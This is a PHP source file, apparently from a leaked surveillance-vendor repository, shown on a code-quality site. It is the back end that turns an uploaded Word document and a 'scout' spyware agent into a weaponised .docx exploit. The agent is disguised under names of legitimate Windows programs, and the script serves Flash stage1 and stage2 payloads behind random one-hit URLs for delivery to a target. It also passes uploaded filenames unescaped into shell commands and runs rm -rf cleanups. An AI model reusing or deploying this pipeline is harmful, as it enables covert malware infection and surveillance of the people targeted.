Sign upLogin

hackedteam/vector-exploit

View on GitHub
Star
src/exploit_vps/html/admin/upload.php

Summary

Maintainability
A
1 hr
Test Coverage
<?php
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");

$scout_names = 
array(

    "C\x00a\x00t\x00a\x00l\x00y\x00s\x00" => "CCC.exe",
    "P\x00o\x00w\x00e\x00r\x00D\x00V\x00D\x00" => "PDVD9Serv.exe",
    "H\x00D\x00 \x00A\x00u\x00d\x00i\x00o\x00" => "RtDCpl.exe",
    "O\x00u\x00t\x00-\x00o\x00f\x00-\x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00" => "sllauncher.exe",
    "L\x00i\x00v\x00e\x00 \x00I\x00D\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00" => "WLIDSVCM.exe",
);

function getScoutName($scout_full_path)
{
    global $scout_names;
    $scout_buff = file_get_contents($scout_full_path);
        if (!strpos($scout_buff, "Iaskdj2AS"))
                die("Bad scout version\n");
    foreach ($scout_names as $key => $value)
        if (strpos($scout_buff, $key))
            return $value;

    return "";
}

function GeraHash($qtd){ 
    //Under the string $Caracteres you write all the characters you want to be used to randomly generate the code. 
    $Caracteres = 'abcdefghijklmnopqrstuvwxyz0123456789'; 
    $QuantidadeCaracteres = strlen($Caracteres); 
    $QuantidadeCaracteres--; 

    $Hash=NULL; 
    for($x=1;$x<=$qtd;$x++){ 
        $Posicao = rand(0,$QuantidadeCaracteres); 
        $Hash .= substr($Caracteres,$Posicao,1); 
    } 

    return $Hash; 
} 

function getName($path, $suffix)
{
    $results = array();
    $handler = opendir($path);
    while ($file = readdir($handler)) 
    {
        if(strstr($file, $suffix))
        {
            return $file;
        }
    }
    return "NAN";
}



$rand_directory = GeraHash(8);



#if(!isset($_FILES['modified']) || !isset($_FILES['original']) || !isset($_FILES['stage1']) || !isset($_FILES['stage2'])) die('Files not uploaded');
#if(!isset($_POST['directory'])) die('Directory not specified');

if(!mkdir('../files/'.$rand_directory)) die('Unable to create directory');
if(!mkdir('../files/'.$rand_directory."/cnt")) die('Unable to create directory');


$cwd = getcwd();
chdir("/var/www/html/admin/2013-002-Word");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-002-Word/original.docx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-002-Word/agent.exe");

$urlbase = 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/';

if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
    $scout_name = "demo.exe";
}
else
{
    $scout_name = getScoutName("/var/www/html/admin/2013-002-Word/agent.exe");
}

if ($scout_name == "")
    die('Unable to get scout name! :(');

mkdir("/tmp/$rand_directory");
copy("original.docx", $_FILES['original']['name']);
system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" > /dev/null 2>&1");

if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
    system("python26 exploit_demo.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" DEMO > /tmp/py.log 2>&1");
}
else
{
    system("python26 exploit.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.docx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");

system("unzip -d /tmp/$rand_directory server.zip >> /tmp/py.log 2>&1");
#system("unzip -d /tmp/$rand_directory sendtotarget.zip >> /tmp/py.log 2>&1");
chdir($cwd);

$directory = '../files/'.$rand_directory;

$conf = array(
    'modified' => 'cnt/modified.zip',
    'original' => 'cnt/original.zip',
    'browsercheck' => true,
    'content-type' => 'application/msword',
    'hits' => 1,
);

$target_zip_name = str_replace(".docx", ".zip", $_FILES['original']['name']);
file_put_contents("$directory/$target_zip_name", '$conf = '.var_export($conf, true).';');
copy("/var/www/html/admin/2013-002-Word/sendtotarget.zip", "$directory/cnt/modified.zip");
copy("/tmp/$rand_directory/original.zip", "$directory/cnt/original.zip");
#copy("/var/www/html/admin/2013-002-Word/original.docx", "$directory/cnt/original.docx");

$conf = array(
    'modified' => 'cnt/stage1',
    'hits' => 1,
);

$stage1_name = getName("/tmp/$rand_directory/", '.swf');
if ($stage1_name == "NAN")
    die("Stage1 blank");

file_put_contents("$directory/".$stage1_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage1_name", "$directory/cnt/stage1");

$conf = array(
    'modified' => 'cnt/stage2',
    'hits' => 1,
);
$stage2_name = getName("/tmp/$rand_directory/", '.dat');
if ($stage2_name == "NAN")
    die("Stage2 blank");
file_put_contents("$directory/".$stage2_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage2_name", "$directory/cnt/stage2");

#echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$_FILES['original']['name'];
echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$target_zip_name;

system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -rf /tmp/$rand_directory");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");

?>